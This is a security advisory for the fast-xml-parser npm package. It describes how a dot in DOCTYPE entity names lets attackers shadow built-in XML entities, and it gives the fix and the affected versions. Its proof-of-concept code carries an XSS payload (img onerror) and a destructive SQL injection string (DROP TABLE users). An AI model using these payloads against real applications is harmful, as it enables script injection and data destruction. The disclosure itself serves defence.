GHSA-m7jm-9gc2-mpf2

Published: 20 Feb 2026
Source: github
GitHub: Reviewed
CVSS3: 9.3

Description

fast-xml-parser has an entity encoding bypass via regex injection in DOCTYPE entity names

Entity encoding bypass via regex injection in DOCTYPE entity names

Summary

A dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow the built-in XML entities (&lt;, &gt;, &amp;, &quot;, &apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when the parsed output is rendered.

Details

The fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed . (period), which is valid in XML names per the W3C spec.

In DocTypeReader.js, entity names are passed directly to RegExp():

```js
entities[entityName] = { regx: RegExp(`&${entityName};`, "g"), val: val };
```

An entity named l. produces the regex /&l.;/g, where . matches any character, including the t in &lt;. Since DOCTYPE entities are replaced before built-in entities, this shadows &lt; entirely.

The same issue exists in OrderedObjParser.js:81 (addExternalEntities). In the v6 codebase, EntitiesParser.js has a validateEntityName function with a character blacklist, but . is not on it:

```js
// v6 EntitiesParser.js line 96
const specialChar = "!?\\/[]$%{}^&*()<>|+"; // no dot
```

Shadowing all 5 built-in entities

| Entity name | Regex created | Shadows |
|---|---|---|
| l. | /&l.;/g | &lt; |
| g. | /&g.;/g | &gt; |
| am. | /&am.;/g | &amp; |
| quo. | /&quo.;/g | &quot; |
| apo. | /&apo.;/g | &apos; |

PoC

```js
const { XMLParser } = require("fast-xml-parser");

const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY l. "<img src=x onerror=alert(1)>">
]>
<root>
  <text>Hello &lt;b&gt;World&lt;/b&gt;</text>
</root>`;

const result = new XMLParser().parse(xml);
console.log(result.root.text);
// Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>
```

No special parser options are needed: processEntities: true is the default.

When an app renders result.root.text in a page (e.g. innerHTML, template interpolation, SSR), the injected <img onerror> fires.

&amp; can be shadowed too:

```js
const xml2 = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY am. "'; DROP TABLE users;--">
]>
<root>SELECT * FROM t WHERE name='O&amp;Brien'</root>`;

const r = new XMLParser().parse(xml2);
console.log(r.root);
// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'
```

Impact

This is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.

  • Default config, no special options
  • Attacker can replace any &lt; / &gt; / &amp; / &quot; / &apos; with arbitrary strings
  • Direct XSS vector when parsed XML content is rendered in a page
  • v5 and v6 both affected

Suggested fix

Escape regex metacharacters before constructing the replacement regex:

```js
const escaped = entityName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
entities[entityName] = { regx: RegExp(`&${escaped};`, "g"), val: val };
```

For v6, add . to the blacklist in validateEntityName:

```js
const specialChar = "!?\\/[].{}^&*()<>|+";
```
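To see why the escaping matters, the following is an added example (not fast-xml-parser's own code) that models the entity-replacement order described in Details: DOCTYPE entities first, built-ins second. It runs the same constructed text through an unescaped and an escaped regex construction, and includes a name check in the style of the v6 blacklist with . added; the entity value and sample text are constructed placeholders.

```javascript
// Built-in entities, applied after DOCTYPE entities (same order as the parser).
const BUILTIN = [
  [/&lt;/g, "<"], [/&gt;/g, ">"], [/&quot;/g, '"'], [/&apos;/g, "'"], [/&amp;/g, "&"],
];

// Escape regex metacharacters so the entity name is matched literally.
function escapeRegex(name) {
  return name.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Build the replacement regex either the vulnerable way or the fixed way.
function buildEntityRegex(name, { escape }) {
  const pattern = escape ? escapeRegex(name) : name;
  return RegExp(`&${pattern};`, "g");
}

// Replace DOCTYPE entities first, then built-ins, and return the decoded text.
function decode(text, doctypeEntities, { escape }) {
  let out = text;
  for (const [name, val] of Object.entries(doctypeEntities)) {
    out = out.replace(buildEntityRegex(name, { escape }), val);
  }
  for (const [re, val] of BUILTIN) out = out.replace(re, val);
  return out;
}

// Constructed sample: an entity named "l." and text that relies on the built-in &lt;.
const ENTITIES = { "l.": "[REPLACED]" };
const TEXT = "Hello &lt;b&gt;World&lt;/b&gt; and &l.;";

// Unescaped: /&l.;/g also consumes every "&lt;", so the markup is rewritten.
function vulnerableResult() { return decode(TEXT, ENTITIES, { escape: false }); }
// Escaped: /&l\.;/g matches only the literal "&l.;" and &lt; decodes normally.
function fixedResult() { return decode(TEXT, ENTITIES, { escape: true }); }

// Blacklist check in the style of v6 validateEntityName, with "." included.
const SPECIAL_CHARS = "!?\\/[].{}^&*()<>|+";
function isValidEntityName(name) {
  return ![...name].some((c) => SPECIAL_CHARS.includes(c));
}

console.log(vulnerableResult()); // Hello [REPLACED]b>World[REPLACED]/b> and [REPLACED]
console.log(fixedResult());      // Hello <b>World</b> and [REPLACED]
```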

Severity

CWE-185 (Incorrect Regular Expression)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N - 9.3 (CRITICAL)

Entity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.

Packages

Name: fast-xml-parser (npm)
Affected versions: >= 5.0.0, < 5.3.5
Fixed version: 5.3.5

Name: fast-xml-parser (npm)
Affected versions: >= 4.1.3, < 4.5.4
Fixed version: 4.5.4

EPSS

Percentile: 3%
0.00014
Low

9.3 Critical

CVSS3

Weaknesses

CWE-185

Related vulnerabilities

CVSS3: 9.3
ubuntu
about 1 month ago

fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. From 4.1.3 to before 5.3.5, a dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (&lt;, &gt;, &amp;, &quot;, &apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered. This vulnerability is fixed in 5.3.5.

CVSS3: 7.1
redhat
about 1 month ago

CVSS3: 9.3
nvd
about 1 month ago

CVSS3: 9.3
debian
about 1 month ago

fast-xml-parser allows users to validate XML, parse XML to JS object, ...
